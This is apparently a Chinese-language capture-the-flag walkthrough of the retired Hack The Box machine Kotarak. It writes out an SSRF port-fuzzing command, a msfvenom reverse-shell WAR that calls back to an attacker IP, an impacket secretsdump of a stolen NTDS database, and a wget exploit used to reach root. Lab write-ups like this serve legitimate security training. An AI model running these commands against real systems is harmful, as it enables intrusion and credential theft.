本篇文章僅用於技術交流學習和研究的目的，嚴禁使用文章中的技術用於非法目的和破壞，否則造成一切後果與發表本文章的作者無關

靶機是作者購買VIP使用退役靶機操作，顯示IP地址為10.10.10.55

本次使用https://github.com/Tib3rius/AutoRecon 進行自動化全方位掃描

執行命令

autorecon 10.10.10.55 -o ./Kotarak-autorecon

發現開放了4555埠，對應的服務是jame-admin 存在遠端程式碼執行漏洞

經過上面的掃描目錄爆破發現了有價值的目錄manager，訪問完成之後頁面顯示可以訪問如下頁面

訪問http://10.10.10.55:8080/manager/html 發現是個401認證，沒賬號和密碼，而且根據頁面的介面和掃描的結果版本資訊，知道目標是apache tomcat ，需要拿到賬號和密碼就可以利用tomcat的war功能進行部署war檔案獲得shell ，看看別的埠

點選了兩把，發現沒啥東西，還是把目光聚焦在輸入框那裡，經過測試發現存在SSRF漏洞，那麼我們可以讀取更多的目標靶機本地開放了哪些服務埠，使用wfuzz命令進行模糊測試探測，當然也可以使用burpsuite進行爆破測試

wfuzz -c -z range,1-65535 --hl=2 http://10.10.10.55:60000/url.php?path=localhost:FUZZ

指定埠範圍和需要隱藏的資訊，最終得出如下資訊

使用SSRF漏洞讀取目標開放的888埠

點選訪問backup發現訪問的頁面是空白，根據SSRF的請求url，構造一下得到如下

得到tomcat的賬號和密碼了，登入到剛才回去的tomcat管理頁面

生成war檔案，並上傳

msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.5 LPORT=8833 -f war > bmfx.war

然後訪問http://10.10.10.55:8080/bmfx/ 本地監聽8833埠即可獲取反彈shell

通過Linenum.sh探測出來了兩個敏感檔案

將這兩個問檔案下載到本地kali中，將其解析出來

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -ntds 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit -system 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin LOCAL

得到了賬戶的密碼hash，通過https://hashes.com/en/decrypt/hash 進行線上解密得出如下資訊

這裡剛開始試對應的atanas的密碼是錯誤的，實際測試是解密出來的administrator密碼是登入atanas的密碼，直接使用su切換使用者

切換成功後切到root使用者目錄看看，發現沒有root.txt檔案，猜測可能在另一臺主機上，不過在root目錄下發現app.log日誌，確認有個計劃任務使用wget的1.16版本週期性下載檔案

通過查詢wget的歷史漏洞資訊，得到如下：https://www.exploit-db.com/exploits/40064

根據上述的exploit提示可以通過遠端程式碼執行反彈shell，利用方式如下：

這裡為了讀取/root/root.txt檔案，我就修改了上面寫的/etc/shadow

需要更改的exploit資訊

本地kali啟動ftp服務

成功之後將exploit下載到目標靶機上，然後執行，但是執行的時候發現沒有許可權，此時可以使用目標靶機提供的authbind命令執行exploit

上面都成功之後本地監聽8833埠，然後就是等待了，這裡要等好幾分鐘，需要耐心，最終結果如下：